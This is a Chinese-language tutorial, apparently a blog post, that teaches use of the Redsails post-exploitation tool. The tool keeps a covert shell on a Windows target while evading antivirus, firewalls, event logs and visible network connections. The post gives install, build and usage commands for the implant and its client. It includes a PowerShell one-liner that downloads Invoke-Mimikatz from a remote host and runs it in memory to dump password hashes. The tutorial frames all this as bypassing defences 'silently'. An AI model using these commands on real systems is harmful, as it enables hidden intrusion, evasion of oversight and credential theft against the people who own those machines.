在我们以往的渗透测试中,经常会遇到目标存在杀软,防火墙等防护软件的情况,导致我们的连接不稳定以及连接中断等情况,今天就教大家如何悄无声息的绕过层层防护开启一个愉快的渗透之旅,请抓紧坐好,准备开车了。
Redsails是使用python开发的一款后渗透测试工具,其目的是可以使我们在目标主机上执行命令且无需创建任何事件日志以及网络连接,详细作用如下:
- 在目标主机持续建立连接
- 绕过许多常见的事件日志
- 产生虚假日志/网络流量
Redsails依赖于PyDivert、Pycrypto和WinDivert包,我们可以使用以下命令进行安装:
代码语言:javascript复制pip install pydivert
pip install pbkdf2
easy_install pycrypto
在安装pycrypto之前,还需要Microsoft Visual C 编译器。
创建可执行文件
代码语言:javascript复制pip install pyinstaller
pyinstaller-script.py -F --clean redSails.spec
用法
在目标主机上执行:redsails.exe -a <IP Address> -p <password> -o <port>在本地进行监听,使用相同的密码就可以获得一个shellpython redsailsClient.py -t <IP Address> -p <password> -o <port> |
---|
这时候神奇的事情发生了,我们看到shell已经连接成功,但是并未建立新的连接,连接端口也一直处于监听状态。
而更加神奇的是即使目标主机上并未开放我们的连接端口,我们也可以正常进行连接,并且不会创建新的连接。
如图,我们使用了22端口进行了连接,但是在目标主机上并未开放22端口,并且也没有任何关于22端口的连接信息。
连接成功之后,我们便可以通过redsails控制台在目标主机上执行系统命令了,执行命令方法如下:
代码语言:javascript复制SHELL::net users
SHELL::whoami
SHELL::ipconfig
Redsails也支持PowerShell,因此它可以执行PowerShell命令。
例如我们想对目标的hash进行抓取,我们可以这样调用Powershell脚本来执行:
代码语言:javascript复制PSHELL::IEX(New-Object Net.WebClient).Downloadstring('http://192.168.100.2/tmp/Invoke-Mimikatz.ps1');Invoke-Mimikatz
也可以利用powershell与Metasploit进行交互,不过这样就会建立一个新的连接,容易被防护系统检测到。
参考资料:
https://github.com/BeetleChunks/redsails